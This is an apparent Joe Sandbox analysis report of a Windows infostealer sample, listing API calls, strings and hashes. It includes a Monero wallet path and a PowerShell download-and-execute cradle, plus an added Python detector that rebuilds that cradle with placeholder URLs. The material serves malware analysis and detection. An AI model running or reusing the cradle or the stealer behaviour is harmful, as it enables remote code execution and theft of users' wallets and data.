                            • Instruction ID: 4d8b0f2c5c2f432e31361ff843f1639e2dbb8d3dbd4f3162d8d057aded547662
                            • Opcode Fuzzy Hash: 9a83ffbbef5c978ee7f6df920e1ce1c469f16e885bbd48b16236c92f299a2288
                            • Instruction Fuzzy Hash: 3521F6B1A00218EBDB24DB54DD85FE9B3B8FB48704F008199A649A7140DF766A86CFA4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC76A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC76AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00A8BB90,00000000,00020119,00000000), ref: 00EC76DD
                            • RegQueryValueExA.ADVAPI32(00000000,00A9D920,00000000,00000000,?,000000FF), ref: 00EC76FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00EC7708
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 797be803780a538bcda71fc0514e7e2eb26a6200c0b7cb711524bcaf49276458
                            • Instruction ID: fbd9f9992a6ee0711fb5e1c5ef44c677a037bc0d4ff9a8140b1ffec275b252fc
                            • Opcode Fuzzy Hash: 797be803780a538bcda71fc0514e7e2eb26a6200c0b7cb711524bcaf49276458
                            • Instruction Fuzzy Hash: B30144B5B04308FBD710DBE4DD4AF6AB7B8EB48705F10405DFA89E7684D6B6A9018F50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC7734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00A8BB90,00000000,00020119,00EC76B9), ref: 00EC775B
                            • RegQueryValueExA.ADVAPI32(00EC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EC777A
                            • RegCloseKey.ADVAPI32(00EC76B9), ref: 00EC7784
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: a1988b941afcb399711ecda2fd1ab1bc0ba1fbf2eeab99b9a4e9d50e53c840b8
                            • Instruction ID: 985c70cc7b01fea28b775b6530e28ef9dc49cd4d254cb10f14c592eb12e54a01
                            • Opcode Fuzzy Hash: a1988b941afcb399711ecda2fd1ab1bc0ba1fbf2eeab99b9a4e9d50e53c840b8
                            • Instruction Fuzzy Hash: 560144B5A40308FBD710DBE0DD4AFAEB7B8EB48705F00415DFA49A7285D6B565018B50
                            APIs
                            • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EC3AEE,?), ref: 00EC92FC
                            • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EC9319
                            • CloseHandle.KERNEL32(000000FF), ref: 00EC9327
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :$:
                            • API String ID: 1378416451-4250114551
                            • Opcode ID: 9a3e79fe23a9df455c5e8c6fdd5f3b5b33608642c99f7c8c21ca35cae4ac7094
                            • Instruction ID: 1789a7a3632ed21faeced71a71f42708948b4d9494b4a67120f572a3cb48df9a
                            • Opcode Fuzzy Hash: 9a3e79fe23a9df455c5e8c6fdd5f3b5b33608642c99f7c8c21ca35cae4ac7094
                            • Instruction Fuzzy Hash: 00F06934F00208EBDB20DAA4DD49F9E77B9AB48710F108658BA55AB2C4D776A6028F40
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                            • LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 33262662534b5ce569803780a99d8168940857741ec2a9cd19851158aa1185a6
                            • Instruction ID: 1351dc22b5e27585b7ae1493db3f6a384aeeb7846024cfc9bb5df3e1cbdfd75f
                            • Opcode Fuzzy Hash: 33262662534b5ce569803780a99d8168940857741ec2a9cd19851158aa1185a6
                            • Instruction Fuzzy Hash: 7A3105B4A00209EFDB24CFA4C985BEE77B5BF48704F108158EA15A7294D779AA41CFA0
                            APIs
                            • lstrcat.KERNEL32(?,00A9DDD0), ref: 00EC47DB
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4801
                            • lstrcat.KERNEL32(?,?), ref: 00EC4820
                            • lstrcat.KERNEL32(?,?), ref: 00EC4834
                            • lstrcat.KERNEL32(?,00A8AF40), ref: 00EC4847
                            • lstrcat.KERNEL32(?,?), ref: 00EC485B
                            • lstrcat.KERNEL32(?,00A9D680), ref: 00EC486F
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8D90: GetFileAttributesA.KERNEL32(00000000,?,00EB1B54,?,?,00ED564C,?,?,00ED0E1F), ref: 00EC8D9F
                              • Part of subcall function 00EC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EC4580
                              • Part of subcall function 00EC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EC4587
                              • Part of subcall function 00EC4570: wsprintfA.USER32 ref: 00EC45A6
                              • Part of subcall function 00EC4570: FindFirstFileA.KERNEL32(?,?), ref: 00EC45BD
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 6fd3b7adcd59e05d2eacd82abe0b41a99225e75624d22149e741e870bf6dd928
                            • Instruction ID: b39788d57ba0fc670a8254e5de098325f97e6c8d1b820d198a80c4e568dfe9eb
                            • Opcode Fuzzy Hash: 6fd3b7adcd59e05d2eacd82abe0b41a99225e75624d22149e741e870bf6dd928
                            • Instruction Fuzzy Hash: CF3176B290021897CB24F770DD86FE973BCAB48700F40559DB35DA6081DEB6978ACB91
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00EC2D85
                            Strings
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EC2D04
                            • <, xrefs: 00EC2D39
                            • ')", xrefs: 00EC2CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EC2CC4
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 8e300a119a4877e85e599e154860f635bb38e6499930f7867cd039b3d0144038
                            • Instruction ID: 213ede884a70eb0c259d2608b8b82db7492b89a5104193e311e279a84546dc27
                            • Opcode Fuzzy Hash: 8e300a119a4877e85e599e154860f635bb38e6499930f7867cd039b3d0144038
                            • Instruction Fuzzy Hash: F241DC72C0020C9BDB18EBA0DA96FEDB7B4AF10304F44512DE516B6191DF762A4BCF91
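The function above assembles a PowerShell download-and-execute cradle from the fixed fragments in its Strings list (the 32-bit SysWOW64 powershell.exe path, `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, the URL, and the closing `')"`) and hands the result to ShellExecuteEx. The following is an added detection example, not part of the Joe Sandbox report and not code from the sample: it checks process-creation command lines for that cradle, records whether the verbatim fragment from this sample was seen, and, going beyond the exact strings on the page, also catches the same cradle spelled with `Invoke-Expression`, a different case, or another WebClient download method. The process events, PIDs and URLs are constructed placeholders; the report does not show the URL this sample used.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Literal fragments recovered from the sample's memory dump (the Strings list
# of the ShellExecuteEx function). The binary concatenates them around the URL.
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""
POWERSHELL_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Loose matching (a generalisation beyond the page): the same cradle written
# with the long alias, different case, or another WebClient download method.
_PS_IMAGE_RE = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"\s]*\\)?powershell(?:\.exe)?"?(?=\s|$)', re.IGNORECASE)
_IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
_DOWNLOAD_RE = re.compile(
    r"net\.webclient\)?\s*\.\s*download(?:string|data|file)\s*\(", re.IGNORECASE)
_URL_RE = re.compile(
    r"download(?:string|data|file)\s*\(\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)
_NOPROFILE_RE = re.compile(r"(?:^|\s)-no(?:p|profile)\b", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    url: Optional[str]
    exact_literal: bool   # the verbatim fragment from this sample, not a look-alike
    wow64: bool           # 32-bit PowerShell image, as this sample uses
    no_profile: bool      # -nop / -NoProfile present


def analyse_cmdline(pid: int, cmdline: str) -> Optional[Finding]:
    """Return a Finding if cmdline is a PowerShell download-and-execute cradle."""
    if not _PS_IMAGE_RE.match(cmdline):
        return None
    # Both halves are required: a download on its own is common in admin
    # scripting; a download whose result is fed to iex is the cradle.
    if not (_IEX_RE.search(cmdline) and _DOWNLOAD_RE.search(cmdline)):
        return None
    url_match = _URL_RE.search(cmdline)
    return Finding(
        pid=pid,
        url=url_match.group(1) if url_match else None,
        exact_literal=CRADLE_PREFIX in cmdline,
        wow64="\\syswow64\\" in cmdline.lower(),
        no_profile=bool(_NOPROFILE_RE.search(cmdline)),
    )


def scan(events: List[Tuple[int, str]]) -> List[Finding]:
    """Run the check over (pid, command line) process-creation events."""
    findings = []
    for pid, cmdline in events:
        f = analyse_cmdline(pid, cmdline)
        if f is not None:
            findings.append(f)
    return findings


# Constructed process-creation events for illustration. The URLs are
# placeholders; the report does not show the one this sample used.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    # 1. The cradle exactly as this sample assembles it.
    (4120, POWERSHELL_WOW64 + " " + CRADLE_PREFIX
           + "http://example.invalid/stage2.ps1" + CRADLE_SUFFIX),
    # 2. Same technique, spelled differently (64-bit image, long alias).
    (4188, 'powershell.exe -NoProfile -Command "Invoke-Expression '
           "(New-Object Net.WebClient).DownloadString('https://example.invalid/y')\""),
    # 3. Download without execution: common in admin scripts, not flagged.
    (4201, 'powershell.exe -nop -c "(New-Object Net.WebClient).DownloadString('
           "'https://example.invalid/readme.txt') | Out-Null\""),
    # 4. Not PowerShell at all, even though the words appear.
    (4210, 'cmd.exe /c echo iex DownloadString('),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The `exact_literal` flag separates a hit on this sample's verbatim fragment from a generic cradle match, which is useful when triaging: the verbatim string plus the SysWOW64 image path is a much tighter indicator than the loose regexes, which will also fire on other loaders that use the same one-liner.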
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EB9F41
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: da4736a11cda19ed3d4f6cfc48163a8440f57467a78e25ec4a0360d3752982dc
                            • Instruction ID: 5a9c1386ef06f4f50efc46971970c79d0dea48e5096837cb4a435905ab889c77
                            • Opcode Fuzzy Hash: da4736a11cda19ed3d4f6cfc48163a8440f57467a78e25ec4a0360d3752982dc
                            • Instruction Fuzzy Hash: 7E615F71A0020CEBDB24EFA4CD96FEE77B5AF44304F049128F90A6F181EB716A06CB51
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,00A9D740,00000000,00020119,?), ref: 00EC40F4
                            • RegQueryValueExA.ADVAPI32(?,00A9DD40,00000000,00000000,00000000,000000FF), ref: 00EC4118
                            • RegCloseKey.ADVAPI32(?), ref: 00EC4122
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4147
                            • lstrcat.KERNEL32(?,00A9DBA8), ref: 00EC415B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: 49e1c086c90b100bca596d8a4fcab0301ba1f2e2c5527bf6d27b43a2ad7ca1d3
                            • Instruction ID: 55b6489d8bbdf75b594a87506dd1725e5abaa0d6f1c518f14f6c6447b9577328
                            • Opcode Fuzzy Hash: 49e1c086c90b100bca596d8a4fcab0301ba1f2e2c5527bf6d27b43a2ad7ca1d3
                            • Instruction Fuzzy Hash: 4341C9B6D00108ABDB24EBA0DC57FEE737DAB88300F40855CB65957185EA765B888BA1
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00EC696C
                            • sscanf.NTDLL ref: 00EC6999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EC69B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EC69C0
                            • ExitProcess.KERNEL32 ref: 00EC69DA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 9efa2e5ffc2ce48901366d81f6b422dcb0eb24b2f84f45010280cb5895c72756
                            • Instruction ID: 23fdc0d07eb19dfb1d0c043ef3e4de97e299d927ffacfb374b2a9bdde33c85c9
                            • Opcode Fuzzy Hash: 9efa2e5ffc2ce48901366d81f6b422dcb0eb24b2f84f45010280cb5895c72756
                            • Instruction Fuzzy Hash: DD21BA75D14208ABCF18EFE4D946AEEB7B5BF48300F04852EE50AB3244EB755605CBA5
                            APIs
